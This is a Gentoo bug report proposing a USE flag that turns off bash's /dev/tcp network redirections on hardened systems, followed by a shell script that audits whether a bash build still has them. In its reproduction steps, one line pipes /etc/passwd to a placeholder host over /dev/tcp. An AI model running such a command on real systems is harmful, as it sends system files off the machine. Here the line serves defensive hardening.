Add a netredirect use flag to the bash ebuilds. Then in the src_compile() add the following lines:

    # Disable /dev/tcp and /dev/udp redirections unless the net use
    # flag has been enabled
    if use netredirect ; then
        myconf="${myconf} --enable-net-redirections"
    else
        myconf="${myconf} --disable-net-redirections"
    fi

The use flag could then be disabled by default in the hardened-gentoo profiles.

Reproducible: Always

Steps to Reproduce:

Default ebuild (sends data to the resolved myip on port 12345):

    $ cat /etc/passwd > /dev/tcp/myip/12345

Patched ebuild with -netredirect:

    $ cat /etc/passwd > /dev/tcp/myip/12345
    -bash: /dev/tcp/myip/12345: No such file or directory

I keep overlays of app-shells/bash now for all my hardened servers, and this would save me a lot of time patching ebuilds for this feature.
Please post a patch against the latest ebuild / metadata.xml.
Created attachment 171298: Patch for bash-3.2_p39.ebuild, adds netredirect use flag
Added to bash-3.2_p48-r1.
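
Added example, not part of the original bug thread or the Gentoo ebuild: a check that reports whether an installed bash was built with network redirections, for confirming that a rebuild with -netredirect took effect. The function names and the loopback probe target (127.0.0.1, port 9) are assumptions of this example.

```shell
#!/bin/sh
# Added example: audit whether a bash binary honours /dev/tcp redirections.

# classify_redirect <exit-status> <stderr-text>
# Maps the outcome of a "/dev/tcp/..." redirection attempt to a verdict.
classify_redirect() {
    status=$1
    msg=$2
    if [ "$status" -eq 0 ]; then
        echo enabled            # connect() succeeded: feature is compiled in
        return 0
    fi
    if [ "$status" -ge 126 ]; then
        echo unknown            # the shell itself could not be executed
        return 0
    fi
    case $msg in
        *"No such file or directory"*)
            echo disabled ;;    # bash treated the path as an ordinary file
        *"Connection refused"*|*"Network is unreachable"*|*"timed out"*)
            echo enabled ;;     # bash attempted a socket connect
        *)
            echo unknown ;;
    esac
}

# probe_bash [path-to-bash]
# Tries an empty write to the loopback discard port (constructed choice);
# no data leaves the host and nothing needs to be listening.
probe_bash() {
    shell=${1:-bash}
    # LC_ALL=C keeps the error text in English so the patterns above match.
    msg=$(LC_ALL=C "$shell" -c ': > /dev/tcp/127.0.0.1/9' 2>&1) \
        && status=0 || status=$?
    classify_redirect "$status" "$msg"
}

# Print the verdict for the given binary (default: bash found in PATH).
probe_bash "${1:-bash}"
```

A verdict of "disabled" corresponds to the "No such file or directory" error shown in the report for the patched ebuild.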